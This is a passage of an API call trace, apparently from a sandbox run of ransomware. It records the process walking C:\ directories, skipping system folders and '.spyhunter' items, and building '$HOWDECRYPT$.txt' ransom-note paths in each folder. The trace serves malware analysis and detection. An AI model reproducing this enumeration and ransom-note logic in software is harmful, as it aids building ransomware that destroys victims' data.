lstrcmpiW (lpString1="Config.Msi", lpString2="$Recycle.bin") returned 1 [0080.372] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.372] lstrcmpiW (lpString1="Config.Msi", lpString2="System Volume Information") returned -1 [0080.372] lstrlenW (lpString="System Volume Information") returned 25 [0080.372] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0080.372] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0080.372] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0080.372] GetProcessHeap () returned 0x2c0000 [0080.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0080.372] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0080.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0x30c378 [0080.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.372] lstrlenW (lpString="Windows") returned 7 [0080.372] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.372] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.372] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.372] lstrlenW (lpString="System Volume Information") returned 25 [0080.372] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0080.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.373] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0080.373] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.373] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0080.373] lstrlenW (lpString="\\\\?\\C:\\Config.Msi\\.") returned 19 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x68) returned 0x30cb48 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x208) returned 0x30b778 [0080.373] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.373] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.373] lstrlenW (lpString="Windows") returned 7 [0080.373] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.373] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.373] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.373] lstrlenW (lpString="System Volume Information") returned 25 [0080.373] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0080.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.373] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0080.373] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.373] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0080.373] lstrlenW (lpString="\\\\?\\C:\\Config.Msi\\..") returned 20 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6a) returned 0x30b988 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x210) returned 0x30ba00 [0080.373] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0 [0080.373] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.373] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\$HOWDECRYPT$.txt") returned 34 [0080.373] lstrlenW (lpString="\\\\?\\C:\\Config.Msi\\$HOWDECRYPT$.txt") returned 34 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30e148 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x218) returned 0x30ba00 [0080.373] GetProcessHeap () returned 0x2c0000 [0080.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e9e90 | out: hHeap=0x2c0000) returned 1 [0080.373] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.374] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0080.374] lstrlenW (lpString="Windows") returned 7 [0080.374] lstrcmpiW (lpString1="Documents and Settings", lpString2="$Recycle.bin") returned 1 [0080.374] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.374] lstrcmpiW (lpString1="Documents and Settings", lpString2="System Volume Information") returned -1 [0080.374] lstrlenW (lpString="System Volume Information") returned 25 [0080.374] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0080.374] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0080.374] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0080.374] GetProcessHeap () returned 0x2c0000 [0080.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0080.374] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0080.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0xffffffff [0080.374] GetProcessHeap () returned 0x2c0000 [0080.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e9e90 | out: hHeap=0x2c0000) returned 1 [0080.374] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.374] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0080.374] lstrlenW (lpString="Windows") returned 7 [0080.374] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$Recycle.bin") returned 1 [0080.374] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.374] lstrcmpiW (lpString1="hiberfil.sys", lpString2="System Volume Information") returned -1 [0080.374] lstrlenW (lpString="System Volume Information") returned 25 [0080.374] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0080.374] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".spyhunter") returned 0x0 [0080.374] lstrcmpW (lpString1="hiberfil.sys", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.374] lstrcmpW (lpString1="hiberfil.sys", lpString2="_uninstalling_.png") returned 1 [0080.374] lstrlenW (lpString="\\\\?\\C:\\hiberfil.sys") returned 19 [0080.374] GetProcessHeap () returned 0x2c0000 [0080.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x68) returned 0x30b778 [0080.374] GetProcessHeap () returned 0x2c0000 [0080.374] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x220) returned 0x30ba00 [0080.374] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.374] lstrcmpiW (lpString1="MSOCache", lpString2="Windows") returned -1 [0080.375] lstrlenW (lpString="Windows") returned 7 [0080.375] lstrcmpiW (lpString1="MSOCache", lpString2="$Recycle.bin") returned 1 [0080.375] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.375] lstrcmpiW (lpString1="MSOCache", lpString2="System Volume Information") returned -1 [0080.375] lstrlenW (lpString="System Volume Information") returned 25 [0080.375] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0080.375] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0080.375] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0080.375] GetProcessHeap () returned 0x2c0000 [0080.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0080.375] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0080.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0x30c378 [0080.375] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.375] lstrlenW (lpString="Windows") returned 7 [0080.375] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.375] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.375] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.375] lstrlenW (lpString="System Volume Information") returned 25 [0080.375] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0080.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.375] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0080.375] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.375] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0080.375] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\.") returned 17 [0080.375] GetProcessHeap () returned 0x2c0000 [0080.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x64) returned 0x30b7e8 [0080.375] GetProcessHeap () returned 0x2c0000 [0080.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x228) returned 0x30ba00 [0080.375] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.375] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.375] lstrlenW (lpString="Windows") returned 7 [0080.375] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.375] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.375] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.375] lstrlenW (lpString="System Volume Information") returned 25 [0080.376] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0080.376] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.376] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0080.376] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.376] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0080.376] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\..") returned 18 [0080.376] GetProcessHeap () returned 0x2c0000 [0080.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x66) returned 0x30b858 [0080.376] GetProcessHeap () returned 0x2c0000 [0080.376] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x230) returned 0x30ba00 [0080.376] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.376] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0080.376] lstrlenW (lpString="Windows") returned 7 [0080.376] lstrcmpiW (lpString1="All Users", lpString2="$Recycle.bin") returned 1 [0080.376] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.376] lstrcmpiW (lpString1="All Users", lpString2="System Volume Information") returned -1 [0080.376] lstrlenW (lpString="System Volume Information") returned 25 [0080.376] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0080.376] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0080.376] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0080.376] GetProcessHeap () returned 0x2c0000 [0080.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.376] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\*") returned 27 [0080.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30b3d8 [0080.434] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.434] lstrlenW (lpString="Windows") returned 7 [0080.434] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.434] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.434] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.434] lstrlenW (lpString="System Volume Information") returned 25 [0080.434] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0080.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.434] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0080.434] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.434] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0080.434] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0080.434] GetProcessHeap () returned 0x2c0000 [0080.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x78) returned 0x2d1330 [0080.434] GetProcessHeap () returned 0x2c0000 [0080.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x238) returned 0x30ba00 [0080.434] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.922] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.922] lstrlenW (lpString="Windows") returned 7 [0080.923] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.923] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.923] lstrlenW (lpString="System Volume Information") returned 25 [0080.923] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0080.923] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.923] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.923] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0080.923] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.923] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0080.923] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0080.923] GetProcessHeap () returned 0x2c0000 [0080.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7a) returned 0x30b8c8 [0080.923] GetProcessHeap () returned 0x2c0000 [0080.923] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x240) returned 0x30ba00 [0080.923] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.923] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0080.923] lstrlenW (lpString="Windows") returned 7 [0080.923] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0080.923] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.923] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0080.923] lstrlenW (lpString="System Volume Information") returned 25 [0080.923] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 66 [0080.923] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0080.923] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0080.923] GetProcessHeap () returned 0x2c0000 [0080.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0080.924] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 68 [0080.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0080.999] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.999] lstrlenW (lpString="Windows") returned 7 [0080.999] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.999] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.999] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.999] lstrlenW (lpString="System Volume Information") returned 25 [0080.999] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0080.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.999] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0080.999] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.999] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0080.999] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0080.999] GetProcessHeap () returned 0x2c0000 [0080.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x30bc48 [0081.000] GetProcessHeap () returned 0x2c0000 [0081.000] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ba00, Size=0x248) returned 0x30bd20 [0081.000] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.000] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.000] lstrlenW (lpString="Windows") returned 7 [0081.000] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.000] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.000] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.000] lstrlenW (lpString="System Volume Information") returned 25 [0081.000] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.000] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.000] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.000] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.000] GetProcessHeap () returned 0x2c0000 [0081.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x30ba00 [0081.000] GetProcessHeap () returned 0x2c0000 [0081.000] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30bd20, Size=0x250) returned 0x30bd20 [0081.000] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.000] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Windows") returned -1 [0081.000] lstrlenW (lpString="Windows") returned 7 [0081.000] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="$Recycle.bin") returned 1 [0081.001] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.001] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="System Volume Information") returned -1 [0081.001] lstrlenW (lpString="System Volume Information") returned 25 [0081.001] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0081.001] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.001] lstrcmpW (lpString1="ExcelLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.001] lstrcmpW (lpString1="ExcelLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.001] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0081.001] GetProcessHeap () returned 0x2c0000 [0081.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x30bad8 [0081.001] GetProcessHeap () returned 0x2c0000 [0081.001] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30bd20, Size=0x258) returned 0x30bd20 [0081.001] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.001] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Windows") returned -1 [0081.001] lstrlenW (lpString="Windows") returned 7 [0081.001] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.001] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.001] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="System Volume Information") returned -1 [0081.001] lstrlenW (lpString="System Volume Information") returned 25 [0081.001] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0081.001] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.001] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.001] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.001] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0081.001] GetProcessHeap () returned 0x2c0000 [0081.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x30bf80 [0081.001] GetProcessHeap () returned 0x2c0000 [0081.001] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30bd20, Size=0x260) returned 0x321018 [0081.002] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.002] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="Windows") returned -1 [0081.002] lstrlenW (lpString="Windows") returned 7 [0081.002] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.002] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.002] lstrcmpiW (lpString1="ExcelMUI.xml", lpString2="System Volume Information") returned -1 [0081.002] lstrlenW (lpString="System Volume Information") returned 25 [0081.002] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0081.002] StrStrIW (lpFirst="ExcelMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.002] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.002] lstrcmpW (lpString1="ExcelMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.002] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0081.002] GetProcessHeap () returned 0x2c0000 [0081.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x30c068 [0081.002] GetProcessHeap () returned 0x2c0000 [0081.002] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x268) returned 0x321018 [0081.002] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.002] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.002] lstrlenW (lpString="Windows") returned 7 [0081.002] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.002] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.002] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.002] lstrlenW (lpString="System Volume Information") returned 25 [0081.002] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.002] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.003] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.003] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.003] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.003] GetProcessHeap () returned 0x2c0000 [0081.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x30c150 [0081.003] GetProcessHeap () returned 0x2c0000 [0081.003] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x270) returned 0x321018 [0081.003] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.003] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.003] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.003] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.003] GetProcessHeap () returned 0x2c0000 [0081.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x30bd20 [0081.003] GetProcessHeap () returned 0x2c0000 [0081.003] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x278) returned 0x321018 [0081.003] GetProcessHeap () returned 0x2c0000 [0081.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.003] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.003] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.004] lstrlenW (lpString="Windows") returned 7 [0081.004] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.004] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.004] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.004] lstrlenW (lpString="System Volume Information") returned 25 [0081.004] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 